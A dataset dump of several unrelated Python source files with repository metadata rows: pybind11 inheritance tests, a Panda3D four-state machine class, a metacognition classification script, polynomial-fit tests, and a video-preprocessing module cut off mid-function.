b = PyClass2()
assert m.dispatch_issue_go(b) == "Yay.."
def test_override_ref():
o = m.OverrideTest("asdf")
# Not allowed (see associated .cpp comment)
# i = o.str_ref()
# assert o.str_ref() == "asdf"
assert o.str_value() == "asdf"
assert o.A_value().value == "hi"
a = o.A_ref()
assert a.value == "hi"
a.value = "bye"
assert a.value == "bye"
def test_inherited_virtuals():
class AR(m.A_Repeat):
def unlucky_number(self):
return 99
class AT(m.A_Tpl):
def unlucky_number(self):
return 999
obj = AR()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 99
assert obj.say_everything() == "hi 99"
obj = AT()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 999
assert obj.say_everything() == "hi 999"
for obj in [m.B_Repeat(), m.B_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 13
assert obj.lucky_number() == 7.0
assert obj.say_everything() == "B says hi 1 times 13"
for obj in [m.C_Repeat(), m.C_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CR(m.C_Repeat):
def lucky_number(self):
return m.C_Repeat.lucky_number(self) + 1.25
obj = CR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 889.25
assert obj.say_everything() == "B says hi 1 times 4444"
class CT(m.C_Tpl):
pass
obj = CT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CCR(CR):
def lucky_number(self):
return CR.lucky_number(self) * 10
obj = CCR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 8892.5
assert obj.say_everything() == "B says hi 1 times 4444"
class CCT(CT):
def lucky_number(self):
return CT.lucky_number(self) * 1000
obj = CCT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888000.0
assert obj.say_everything() == "B says hi 1 times 4444"
class DR(m.D_Repeat):
def unlucky_number(self):
return 123
def lucky_number(self):
return 42.0
for obj in [m.D_Repeat(), m.D_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
obj = DR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 123
assert obj.lucky_number() == 42.0
assert obj.say_everything() == "B says hi 1 times 123"
class DT(m.D_Tpl):
def say_something(self, times):
return "DT says:" + (' quack' * times)
def unlucky_number(self):
return 1234
def lucky_number(self):
return -4.25
obj = DT()
assert obj.say_something(3) == "DT says: quack quack quack"
assert obj.unlucky_number() == 1234
assert obj.lucky_number() == -4.25
assert obj.say_everything() == "DT says: quack 1234"
class DT2(DT):
def say_something(self, times):
return "DT2: " + ('QUACK' * times)
def unlucky_number(self):
return -3
class BT(m.B_Tpl):
def say_something(self, times):
return "BT" * times
def unlucky_number(self):
return -7
def lucky_number(self):
return -1.375
obj = BT()
assert obj.say_something(3) == "BTBTBT"
assert obj.unlucky_number() == -7
assert obj.lucky_number() == -1.375
assert obj.say_everything() == "BT -7"
def test_issue_1454():
# Fix issue #1454 (crash when acquiring/releasing GIL on another thread in Python 2.7)
m.test_gil()
m.test_gil_from_thread()
| true
| true
|
1c491aaecf3820639d4577824689582c9c1e2b3d
| 9,122
|
py
|
Python
|
dependencies/panda/Panda3D-1.10.0-x64/direct/fsm/FourStateAI.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
dependencies/panda/Panda3D-1.10.0-x64/direct/fsm/FourStateAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
dependencies/panda/Panda3D-1.10.0-x64/direct/fsm/FourStateAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
"""Undocumented Module"""
__all__ = ['FourStateAI']
from direct.directnotify import DirectNotifyGlobal
#import DistributedObjectAI
import ClassicFSM
import State
from direct.task import Task
class FourStateAI:
"""
Generic four state ClassicFSM base class.
This is a mix-in class that expects that your derived class
is a DistributedObjectAI.
Inherit from FourStateFSM and pass in your states. Two of
the states should be oposites of each other and the other
two should be the transition states between the first two.
E.g.
+--------+
-->| closed | --
| +--------+ |
| |
| v
+---------+ +---------+
| closing |<----->| opening |
+---------+ +---------+
^ |
| |
| +------+ |
----| open |<---
+------+
There is a fifth off state, but that is an implementation
detail (and that's why it's not called a five state ClassicFSM).
I found that this pattern repeated in several things I was
working on, so this base class was created.
"""
notify = DirectNotifyGlobal.directNotify.newCategory('FourStateAI')
def __init__(self, names, durations = [0, 1, None, 1, 1]):
"""
names is a list of state names
E.g.
['off', 'opening', 'open', 'closing', 'closed',]
e.g. 2:
['off', 'locking', 'locked', 'unlocking', 'unlocked',]
e.g. 3:
['off', 'deactivating', 'deactive', 'activating', 'activated',]
durations is a list of durations in seconds or None values.
The list of duration values should be the same length
as the list of state names and the lists correspond.
For each state, after n seconds, the ClassicFSM will move to
the next state. That does not happen for any duration
values of None.
More Details
Here is a diagram showing the where the names from the list
are used:
+---------+
| 0 (off) |----> (any other state and vice versa).
+---------+
+--------+
-->| 4 (on) |---
| +--------+ |
| |
| v
+---------+ +---------+
| 3 (off) |<----->| 1 (off) |
+---------+ +---------+
^ |
| |
| +---------+ |
--| 2 (off) |<--
+---------+
Each states also has an associated on or off value. The only
state that is 'on' is state 4. So, the transition states
between off and on (states 1 and 3) are also considered
off (and so is state 2 which is oposite of state 4 and therefore
oposite of 'on').
"""
self.stateIndex = 0
assert self.debugPrint(
"FourStateAI(names=%s, durations=%s)"
%(names, durations))
self.doLaterTask = None
assert len(names) == 5
assert len(names) == len(durations)
self.names = names
self.durations = durations
self.states = {
0: State.State(names[0],
self.enterState0,
self.exitState0,
[names[1],
names[2],
names[3],
names[4]]),
1: State.State(names[1],
self.enterState1,
self.exitState1,
[names[2], names[3]]),
2: State.State(names[2],
self.enterState2,
self.exitState2,
[names[3]]),
3: State.State(names[3],
self.enterState3,
self.exitState3,
[names[4], names[1]]),
4: State.State(names[4],
self.enterState4,
self.exitState4,
[names[1]]),
}
self.fsm = ClassicFSM.ClassicFSM('FourState',
self.states.values(),
# Initial State
names[0],
# Final State
names[0],
)
self.fsm.enterInitialState()
def delete(self):
assert self.debugPrint("delete()")
if self.doLaterTask is not None:
self.doLaterTask.remove()
del self.doLaterTask
del self.states
del self.fsm
def getState(self):
assert self.debugPrint("getState() returning %s"%(self.stateIndex,))
return [self.stateIndex]
def sendState(self):
assert self.debugPrint("sendState()")
self.sendUpdate('setState', self.getState())
def setIsOn(self, isOn):
assert self.debugPrint("setIsOn(isOn=%s)"%(isOn,))
if isOn:
if self.stateIndex != 4:
# ...if it's not On; request turning on:
self.fsm.request(self.states[3])
else:
if self.stateIndex != 2:
# ...if it's not Off; request turning off:
self.fsm.request(self.states[1])
#if isOn:
# nextState = (4, 3, 3, 4, None)[self.stateIndex]
#else:
# nextState = (2, 2, None, 1, 1)[self.stateIndex]
#if nextState is not None:
# self.fsm.request(self.states[nextState])
def isOn(self):
assert self.debugPrint("isOn() returning %s (stateIndex=%s)"%(self.stateIndex==4, self.stateIndex))
return self.stateIndex==4
def changedOnState(self, isOn):
"""
Allow derived classes to overide this.
The self.isOn value has toggled. Call getIsOn() to
get the current state.
"""
assert self.debugPrint("changedOnState(isOn=%s)"%(isOn,))
##### states #####
def switchToNextStateTask(self, task):
assert self.debugPrint("switchToNextStateTask()")
self.fsm.request(self.states[self.nextStateIndex])
return Task.done
def distributeStateChange(self):
"""
This function is intentionaly simple so that derived classes
may easily alter the network message.
"""
assert self.debugPrint("distributeStateChange()")
self.sendState()
def enterStateN(self, stateIndex, nextStateIndex):
assert self.debugPrint(
"enterStateN(stateIndex=%s, nextStateIndex=%s)"%
(stateIndex, nextStateIndex))
self.stateIndex = stateIndex
self.nextStateIndex = nextStateIndex
self.distributeStateChange()
if self.durations[stateIndex] is not None:
assert self.doLaterTask is None
self.doLaterTask=taskMgr.doMethodLater(
self.durations[stateIndex],
self.switchToNextStateTask,
"enterStateN-timer-%s"%id(self))
def exitStateN(self):
assert self.debugPrint("exitStateN()")
if self.doLaterTask:
taskMgr.remove(self.doLaterTask)
self.doLaterTask=None
##### state 0 #####
def enterState0(self):
assert self.debugPrint("enter0()")
self.enterStateN(0, 0)
def exitState0(self):
assert self.debugPrint("exit0()")
##### state 1 #####
def enterState1(self):
#assert self.debugPrint("enterState1()")
self.enterStateN(1, 2)
def exitState1(self):
assert self.debugPrint("exitState1()")
self.exitStateN()
##### state 2 #####
def enterState2(self):
#assert self.debugPrint("enterState2()")
self.enterStateN(2, 3)
def exitState2(self):
assert self.debugPrint("exitState2()")
self.exitStateN()
##### state 3 #####
def enterState3(self):
#assert self.debugPrint("enterState3()")
self.enterStateN(3, 4)
def exitState3(self):
assert self.debugPrint("exitState3()")
self.exitStateN()
##### state 4 #####
def enterState4(self):
assert self.debugPrint("enterState4()")
self.enterStateN(4, 1)
self.changedOnState(1)
def exitState4(self):
assert self.debugPrint("exitState4()")
self.exitStateN()
self.changedOnState(0)
if __debug__:
def debugPrint(self, message):
"""for debugging"""
return self.notify.debug("%d (%d) %s"%(
id(self), self.stateIndex==4, message))
| 33.050725
| 107
| 0.484652
|
__all__ = ['FourStateAI']
from direct.directnotify import DirectNotifyGlobal
import ClassicFSM
import State
from direct.task import Task
class FourStateAI:
notify = DirectNotifyGlobal.directNotify.newCategory('FourStateAI')
def __init__(self, names, durations = [0, 1, None, 1, 1]):
self.stateIndex = 0
assert self.debugPrint(
"FourStateAI(names=%s, durations=%s)"
%(names, durations))
self.doLaterTask = None
assert len(names) == 5
assert len(names) == len(durations)
self.names = names
self.durations = durations
self.states = {
0: State.State(names[0],
self.enterState0,
self.exitState0,
[names[1],
names[2],
names[3],
names[4]]),
1: State.State(names[1],
self.enterState1,
self.exitState1,
[names[2], names[3]]),
2: State.State(names[2],
self.enterState2,
self.exitState2,
[names[3]]),
3: State.State(names[3],
self.enterState3,
self.exitState3,
[names[4], names[1]]),
4: State.State(names[4],
self.enterState4,
self.exitState4,
[names[1]]),
}
self.fsm = ClassicFSM.ClassicFSM('FourState',
self.states.values(),
names[0],
names[0],
)
self.fsm.enterInitialState()
def delete(self):
assert self.debugPrint("delete()")
if self.doLaterTask is not None:
self.doLaterTask.remove()
del self.doLaterTask
del self.states
del self.fsm
def getState(self):
assert self.debugPrint("getState() returning %s"%(self.stateIndex,))
return [self.stateIndex]
def sendState(self):
assert self.debugPrint("sendState()")
self.sendUpdate('setState', self.getState())
def setIsOn(self, isOn):
assert self.debugPrint("setIsOn(isOn=%s)"%(isOn,))
if isOn:
if self.stateIndex != 4:
self.fsm.request(self.states[3])
else:
if self.stateIndex != 2:
# ...if it's not Off; request turning off:
self.fsm.request(self.states[1])
def isOn(self):
assert self.debugPrint("isOn() returning %s (stateIndex=%s)"%(self.stateIndex==4, self.stateIndex))
return self.stateIndex==4
def changedOnState(self, isOn):
assert self.debugPrint("changedOnState(isOn=%s)"%(isOn,))
def switchToNextStateTask(self, task):
assert self.debugPrint("switchToNextStateTask()")
self.fsm.request(self.states[self.nextStateIndex])
return Task.done
def distributeStateChange(self):
assert self.debugPrint("distributeStateChange()")
self.sendState()
def enterStateN(self, stateIndex, nextStateIndex):
assert self.debugPrint(
"enterStateN(stateIndex=%s, nextStateIndex=%s)"%
(stateIndex, nextStateIndex))
self.stateIndex = stateIndex
self.nextStateIndex = nextStateIndex
self.distributeStateChange()
if self.durations[stateIndex] is not None:
assert self.doLaterTask is None
self.doLaterTask=taskMgr.doMethodLater(
self.durations[stateIndex],
self.switchToNextStateTask,
"enterStateN-timer-%s"%id(self))
def exitStateN(self):
assert self.debugPrint("exitStateN()")
if self.doLaterTask:
taskMgr.remove(self.doLaterTask)
self.doLaterTask=None
def enterState0(self):
assert self.debugPrint("enter0()")
self.enterStateN(0, 0)
def exitState0(self):
assert self.debugPrint("exit0()")
def enterState1(self):
self.enterStateN(1, 2)
def exitState1(self):
assert self.debugPrint("exitState1()")
self.exitStateN()
def enterState2(self):
self.enterStateN(2, 3)
def exitState2(self):
assert self.debugPrint("exitState2()")
self.exitStateN()
def enterState3(self):
self.enterStateN(3, 4)
def exitState3(self):
assert self.debugPrint("exitState3()")
self.exitStateN()
def enterState4(self):
assert self.debugPrint("enterState4()")
self.enterStateN(4, 1)
self.changedOnState(1)
def exitState4(self):
assert self.debugPrint("exitState4()")
self.exitStateN()
self.changedOnState(0)
if __debug__:
def debugPrint(self, message):
return self.notify.debug("%d (%d) %s"%(
id(self), self.stateIndex==4, message))
| true
| true
|
1c491ab6c233c3d0fde8e8f78bc978736494bc63
| 4,635
|
py
|
Python
|
3 experiments_confidence/batch/e2 (experiment and chance scores) (sva).py
|
nmningmei/metacognition
|
734082e247cc7fc9d277563e2676e10692617a3f
|
[
"MIT"
] | 3
|
2019-07-09T15:37:46.000Z
|
2019-07-17T16:28:02.000Z
|
3 experiments_confidence/batch/e2 (experiment and chance scores) (sva).py
|
nmningmei/metacognition
|
734082e247cc7fc9d277563e2676e10692617a3f
|
[
"MIT"
] | null | null | null |
3 experiments_confidence/batch/e2 (experiment and chance scores) (sva).py
|
nmningmei/metacognition
|
734082e247cc7fc9d277563e2676e10692617a3f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 12 16:07:58 2018
@author: nmei
in exp2 (e2) there were 3 possible awareness ratings ( (e.g. 1- no experience, 2 brief glimpse 3 almost clear or clear perception)
BUT if can make a binary classification by focussing on 1 and 2 which are the majority of the trials.
"""
if __name__ == '__main__':
import os
import pandas as pd
import numpy as np
import utils
# define result saving directory
dir_saving = 'results_e2'
if not os.path.exists(dir_saving):
os.mkdir(dir_saving)
try:# the subject level processing
df1 = pd.read_csv('e2.csv').iloc[:,1:]
except: # when I test the script
df1 = pd.read_csv('../e2.csv').iloc[:,1:]
df = df1.copy()
# select the columns that I need
df = df[['blocks.thisN',
'trials.thisN',
'key_resp_2.keys',
'resp.corr',
'resp_mrating.keys',
'participant',]]
# rename the columns
df.columns = ['blocks',
'trials',
'awareness',
'correctness',
'confidence',
'participant',]
# preallocate the data frame structure
results = dict(sub = [],
model = [],
score = [],
window = [],
correctness = [],
awareness = [],
confidence = [],
chance = [],
)
# use success, awareness, and confidence as features
np.random.seed(12345)
# use judgement features
feature_names = [
'correctness',
'awareness',
'confidence',
]
target_name = 'confidence'
experiment = 'e2'
# for some of the variables, we need to rescale them to a more preferable range like 0-1
name_for_scale = ['awareness']
# 'ack', 'cc', 'ck', 'cpj', 'em', 'es', 'fd', 'jmac', 'lidia', 'ls','mimi', 'pr', 'pss', 'sva', 'tj'
# get one of the participants' data
participant = 'sva'
df_sub = df[df['participant'] == participant]
# pick 1- no experience, 2 brief glimpse for binary classification
df_sub = df_sub[df_sub['awareness'] != 3]
# for 1-back to 4-back
for n_back in np.arange(1,5):
# experiment score
results = utils.classification(
df_sub.dropna(), # take out nan rows
feature_names, # feature columns
target_name, # target column
results, # the saving structure
participant, # participant's name
experiment, # experiment name
window = n_back, # N-back
chance = False, # it is NOT estimating the chance level but the empirical classification experiment
name_for_scale = name_for_scale # scale some of the variables
)
# empirical chance level
results = utils.classification(
df_sub.dropna(),
feature_names,
target_name,
results,
participant,
experiment,
window = n_back,
chance = True, # it is to estimate the empirical chance level
name_for_scale = name_for_scale
)
results_to_save = pd.DataFrame(results)
results_to_save.to_csv(os.path.join(dir_saving,'{}.csv'.format(participant)))
| 31.965517
| 159
| 0.408846
|
if __name__ == '__main__':
import os
import pandas as pd
import numpy as np
import utils
dir_saving = 'results_e2'
if not os.path.exists(dir_saving):
os.mkdir(dir_saving)
try: df1 = pd.read_csv('e2.csv').iloc[:,1:]
except: df1 = pd.read_csv('../e2.csv').iloc[:,1:]
df = df1.copy()
df = df[['blocks.thisN',
'trials.thisN',
'key_resp_2.keys',
'resp.corr',
'resp_mrating.keys',
'participant',]]
df.columns = ['blocks',
'trials',
'awareness',
'correctness',
'confidence',
'participant',]
results = dict(sub = [],
model = [],
score = [],
window = [],
correctness = [],
awareness = [],
confidence = [],
chance = [],
)
np.random.seed(12345)
feature_names = [
'correctness',
'awareness',
'confidence',
]
target_name = 'confidence'
experiment = 'e2'
name_for_scale = ['awareness']
participant = 'sva'
df_sub = df[df['participant'] == participant]
# pick 1- no experience, 2 brief glimpse for binary classification
df_sub = df_sub[df_sub['awareness'] != 3]
# for 1-back to 4-back
for n_back in np.arange(1,5):
# experiment score
results = utils.classification(
df_sub.dropna(), # take out nan rows
feature_names, # feature columns
target_name, # target column
results, # the saving structure
participant, # participant's name
experiment, window = n_back, chance = False, name_for_scale = name_for_scale )
results = utils.classification(
df_sub.dropna(),
feature_names,
target_name,
results,
participant,
experiment,
window = n_back,
chance = True, name_for_scale = name_for_scale
)
results_to_save = pd.DataFrame(results)
results_to_save.to_csv(os.path.join(dir_saving,'{}.csv'.format(participant)))
| true
| true
|
1c491afc51f17dc03bb931dc49f52fe76e38b519
| 84
|
py
|
Python
|
python/src/test/resources/pyfunc/numpy_random12_test.py
|
maropu/lljvm-translator
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 70
|
2017-12-12T10:54:00.000Z
|
2022-03-22T07:45:19.000Z
|
python/src/test/resources/pyfunc/numpy_random12_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 14
|
2018-02-28T01:29:46.000Z
|
2019-12-10T01:42:22.000Z
|
python/src/test/resources/pyfunc/numpy_random12_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 4
|
2019-07-21T07:58:25.000Z
|
2021-02-01T09:46:59.000Z
|
import numpy as np
def numpy_random12_test(n):
return np.random.random_sample(n)
| 16.8
| 35
| 0.785714
|
import numpy as np
def numpy_random12_test(n):
return np.random.random_sample(n)
| true
| true
|
1c491cd25b535c646b407c2dfd699502dec5cea3
| 2,152
|
py
|
Python
|
test/test_multivariablePolynomialFit_Function.py
|
ZachMontgomery/PolyFits
|
0634bcd3a24b12a22b566a0c134cddf733d28641
|
[
"MIT"
] | null | null | null |
test/test_multivariablePolynomialFit_Function.py
|
ZachMontgomery/PolyFits
|
0634bcd3a24b12a22b566a0c134cddf733d28641
|
[
"MIT"
] | null | null | null |
test/test_multivariablePolynomialFit_Function.py
|
ZachMontgomery/PolyFits
|
0634bcd3a24b12a22b566a0c134cddf733d28641
|
[
"MIT"
] | null | null | null |
import numpy as np
import polyFits as pf
import json
fn = './test/'
f = open(fn+'database.txt', 'r')
database = f.readlines()
f.close()
aoa, dp, cl, cd, cm = [], [], [], [], []
for line in database[1:]:
aoa.append( float( line[ 8: 25] ) )
dp.append( float( line[ 34: 51] ) )
cl.append( float( line[ 60: 77] ) )
cd.append( float( line[ 87:103] ) )
cm.append( float( line[112: ] ) )
X = np.array([aoa, dp]).T
f = open(fn+'fit_CL.json', 'r')
clDict = json.load(f)
f.close()
f = open(fn+'fit_CD.json', 'r')
cdDict = json.load(f)
f.close()
f = open(fn+'fit_Cm.json', 'r')
cmDict = json.load(f)
f.close()
aCL, nvecCL, r2CL = pf.dict2list(clDict)
aCD, nvecCD, r2CD = pf.dict2list(cdDict)
aCm, nvecCm, r2Cm = pf.dict2list(cmDict)
f = open(fn+'a5dp10.txt', 'r')
clval = float(f.readline())
cdval = float(f.readline())
cmval = float(f.readline())
f.close()
aoa, dp = 5.*np.pi/180., 10.*np.pi/180.
def test_simpleConstriants():
aaCL, rr2CL = pf.multivariablePolynomialFit(nvecCL, X, cl, sym_same=[(0,1)], verbose=False)
assert len(aCL) == len(aaCL)
for j in range(pf.calcJ(nvecCL)):
assert aCL[j] == aaCL[j]
assert r2CL == rr2CL
cclval = pf.multivariablePolynomialFunction(aCL, nvecCL, [aoa, dp])
assert clval == cclval
def test_percent():
aaCD, rr2CD = pf.multivariablePolynomialFit(nvecCD, X, cd, sym_diff=[(0,1)], percent=True, verbose=False)
assert len(aCD) == len(aaCD)
for j in range(pf.calcJ(nvecCD)):
assert aCD[j] == aaCD[j]
assert r2CD == rr2CD
ccdval = pf.multivariablePolynomialFunction(aCD, nvecCD, [aoa, dp])
assert cdval == ccdval
def test_weighting():
def w(x, y, p):
if abs(y[p]) < 0.0001:
return 1.
return 0.0001 / abs(y[p])
aaCm, rr2Cm = pf.multivariablePolynomialFit(nvecCm, X, cm, sym_same=[(0,1)], weighting=w, verbose=False)
assert len(aCm) == len(aaCm)
for j in range(pf.calcJ(nvecCm)):
assert aCm[j] == aaCm[j]
assert r2Cm == rr2Cm
ccmval = pf.multivariablePolynomialFunction(aCm, nvecCm, [aoa, dp])
assert cmval == ccmval
| 26.243902
| 109
| 0.605019
|
import numpy as np
import polyFits as pf
import json
fn = './test/'
f = open(fn+'database.txt', 'r')
database = f.readlines()
f.close()
aoa, dp, cl, cd, cm = [], [], [], [], []
for line in database[1:]:
aoa.append( float( line[ 8: 25] ) )
dp.append( float( line[ 34: 51] ) )
cl.append( float( line[ 60: 77] ) )
cd.append( float( line[ 87:103] ) )
cm.append( float( line[112: ] ) )
X = np.array([aoa, dp]).T
f = open(fn+'fit_CL.json', 'r')
clDict = json.load(f)
f.close()
f = open(fn+'fit_CD.json', 'r')
cdDict = json.load(f)
f.close()
f = open(fn+'fit_Cm.json', 'r')
cmDict = json.load(f)
f.close()
aCL, nvecCL, r2CL = pf.dict2list(clDict)
aCD, nvecCD, r2CD = pf.dict2list(cdDict)
aCm, nvecCm, r2Cm = pf.dict2list(cmDict)
f = open(fn+'a5dp10.txt', 'r')
clval = float(f.readline())
cdval = float(f.readline())
cmval = float(f.readline())
f.close()
aoa, dp = 5.*np.pi/180., 10.*np.pi/180.
def test_simpleConstriants():
aaCL, rr2CL = pf.multivariablePolynomialFit(nvecCL, X, cl, sym_same=[(0,1)], verbose=False)
assert len(aCL) == len(aaCL)
for j in range(pf.calcJ(nvecCL)):
assert aCL[j] == aaCL[j]
assert r2CL == rr2CL
cclval = pf.multivariablePolynomialFunction(aCL, nvecCL, [aoa, dp])
assert clval == cclval
def test_percent():
aaCD, rr2CD = pf.multivariablePolynomialFit(nvecCD, X, cd, sym_diff=[(0,1)], percent=True, verbose=False)
assert len(aCD) == len(aaCD)
for j in range(pf.calcJ(nvecCD)):
assert aCD[j] == aaCD[j]
assert r2CD == rr2CD
ccdval = pf.multivariablePolynomialFunction(aCD, nvecCD, [aoa, dp])
assert cdval == ccdval
def test_weighting():
def w(x, y, p):
if abs(y[p]) < 0.0001:
return 1.
return 0.0001 / abs(y[p])
aaCm, rr2Cm = pf.multivariablePolynomialFit(nvecCm, X, cm, sym_same=[(0,1)], weighting=w, verbose=False)
assert len(aCm) == len(aaCm)
for j in range(pf.calcJ(nvecCm)):
assert aCm[j] == aaCm[j]
assert r2Cm == rr2Cm
ccmval = pf.multivariablePolynomialFunction(aCm, nvecCm, [aoa, dp])
assert cmval == ccmval
| true
| true
|
1c491ddc1083a7330a21f38ee5180e48205db0d8
| 5,606
|
py
|
Python
|
vidbench/data/process.py
|
melaniebeck/video-classification
|
eeb879605f8265ce28a007d5239f0e85aeed0719
|
[
"Apache-2.0"
] | 2
|
2022-02-11T20:49:44.000Z
|
2022-02-25T14:52:42.000Z
|
vidbench/data/process.py
|
melaniebeck/video-classification
|
eeb879605f8265ce28a007d5239f0e85aeed0719
|
[
"Apache-2.0"
] | 2
|
2022-01-05T22:59:30.000Z
|
2022-01-24T19:39:49.000Z
|
vidbench/data/process.py
|
isabella232/CML_AMP_Video_Classification
|
145eb44ac70e7669a706d5f67914a7d28fd931fe
|
[
"Apache-2.0"
] | 1
|
2022-03-07T18:23:59.000Z
|
2022-03-07T18:23:59.000Z
|
# ###########################################################################
#
# CLOUDERA APPLIED MACHINE LEARNING PROTOTYPE (AMP)
# (C) Cloudera, Inc. 2021
# All rights reserved.
#
# Applicable Open Source License: Apache 2.0
#
# NOTE: Cloudera open source products are modular software products
# made up of hundreds of individual components, each of which was
# individually copyrighted. Each Cloudera open source product is a
# collective work under U.S. Copyright Law. Your license to use the
# collective work is as provided in your written agreement with
# Cloudera. Used apart from the collective work, this file is
# licensed for your use pursuant to the open source license
# identified above.
#
# This code is provided to you pursuant a written agreement with
# (i) Cloudera, Inc. or (ii) a third-party authorized to distribute
# this code. If you do not have a written agreement with Cloudera nor
# with an authorized and properly licensed third party, you do not
# have any rights to access nor to use this code.
#
# Absent a written agreement with Cloudera, Inc. (“Cloudera”) to the
# contrary, A) CLOUDERA PROVIDES THIS CODE TO YOU WITHOUT WARRANTIES OF ANY
# KIND; (B) CLOUDERA DISCLAIMS ANY AND ALL EXPRESS AND IMPLIED
# WARRANTIES WITH RESPECT TO THIS CODE, INCLUDING BUT NOT LIMITED TO
# IMPLIED WARRANTIES OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE; (C) CLOUDERA IS NOT LIABLE TO YOU,
# AND WILL NOT DEFEND, INDEMNIFY, NOR HOLD YOU HARMLESS FOR ANY CLAIMS
# ARISING FROM OR RELATED TO THE CODE; AND (D)WITH RESPECT TO YOUR EXERCISE
# OF ANY RIGHTS GRANTED TO YOU FOR THE CODE, CLOUDERA IS NOT LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, PUNITIVE OR
# CONSEQUENTIAL DAMAGES INCLUDING, BUT NOT LIMITED TO, DAMAGES
# RELATED TO LOST REVENUE, LOST PROFITS, LOSS OF INCOME, LOSS OF
# BUSINESS ADVANTAGE OR UNAVAILABILITY, OR LOSS OR CORRUPTION OF
# DATA.
#
# ###########################################################################
import cv2
import imageio
import numpy as np
import pathlib
from tensorflow_docs.vis import embed
# Adapted from https://www.tensorflow.org/hub/tutorials/action_recognition_with_tf_hub
def crop_center_square(frame):
"""Crops a square from the center of a rectangular array."""
y, x = frame.shape[0:2]
min_dim = min(y, x)
start_x = (x // 2) - (min_dim // 2)
start_y = (y // 2) - (min_dim // 2)
return frame[start_y : start_y + min_dim, start_x : start_x + min_dim]
def pad_to_square(frame):
"""Pads a rectangular array with zeros, so as to make it squared."""
y, x = frame.shape[0:2]
if y > x:
add_x_left = (y - x) // 2
add_x_right = y - x - add_x_left
frame = cv2.copyMakeBorder(
frame, 0, 0, add_x_left, add_x_right, cv2.BORDER_CONSTANT, value=0
)
else:
add_y_up = (x - y) // 2
add_y_down = x - y - add_y_up
frame = cv2.copyMakeBorder(
frame, add_y_down, add_y_up, 0, 0, cv2.BORDER_CONSTANT, value=0
)
return frame
# Adapted from https://www.tensorflow.org/hub/tutorials/action_recognition_with_tf_hub
def load_and_resize_video(path, resize=(224, 224), resize_type="crop"):
"""Convert video to Numpy array of shape and type expected by i3d model.
The function resizes them to shape
[max_frames, 224, 224, 3], in RGB format, with floating point values in
range [0, 1], as expected by i3d.
"""
cap = cv2.VideoCapture(path)
frames = []
try:
while True:
ret, frame = cap.read() # frame is in BGR format
if not ret:
break
if resize_type == "crop":
frame = crop_center_square(frame)
elif resize_type == "pad":
frame = pad_to_square(frame)
else:
return ValueError("Invalid resize_type: " + resize_type)
frame = cv2.resize(frame, resize)
frame = frame[:, :, [2, 1, 0]] # Convert from BGR to RGB
frames.append(frame)
finally:
cap.release()
return np.array(frames).astype("float32") / 255.0
def resample_video(video: np.array, num_frames: int) -> np.array:
""" Resample a video to have num_frames number of frames.
Video must have shape (1, current_num_frames, :, :, :)
if num_frames < current_num_frames, video is downsampled by removing frames
more or less evenly spaced throughout the duration of the video.
if num_frames > current_num_frames, video is upsampled by duplicating frames
more or less evenly spaced throughout the duration of the video.
"""
current_num_frames = video.shape[1]
indices = [(current_num_frames * i) // num_frames for i in range(num_frames)]
return video[:, indices, :, :, :]
def video_acceptable(video_np, min_num_frames_acceptable: int = 128) -> bool:
"""Checks if video has minimum acceptable temporal length"""
num_frames = video_np.shape[1]
if num_frames < min_num_frames_acceptable:
video_path_no_dir = pathlib.Path(video_path).name
print(f"Skipping video {video_path_no_dir}, too few frames: {num_frames}")
return False
return True
# Adapted from https://www.tensorflow.org/hub/tutorials/action_recognition_with_tf_hub
def to_gif(images):
"""Converts an array of images to gif."""
converted_images = np.clip(images * 255, 0, 255).astype(np.uint8)
imageio.mimsave("./animation.gif", converted_images, fps=25)
return embed.embed_file("./animation.gif")
| 39.758865
| 86
| 0.665715
|
import cv2
import imageio
import numpy as np
import pathlib
from tensorflow_docs.vis import embed
def crop_center_square(frame):
y, x = frame.shape[0:2]
min_dim = min(y, x)
start_x = (x // 2) - (min_dim // 2)
start_y = (y // 2) - (min_dim // 2)
return frame[start_y : start_y + min_dim, start_x : start_x + min_dim]
def pad_to_square(frame):
y, x = frame.shape[0:2]
if y > x:
add_x_left = (y - x) // 2
add_x_right = y - x - add_x_left
frame = cv2.copyMakeBorder(
frame, 0, 0, add_x_left, add_x_right, cv2.BORDER_CONSTANT, value=0
)
else:
add_y_up = (x - y) // 2
add_y_down = x - y - add_y_up
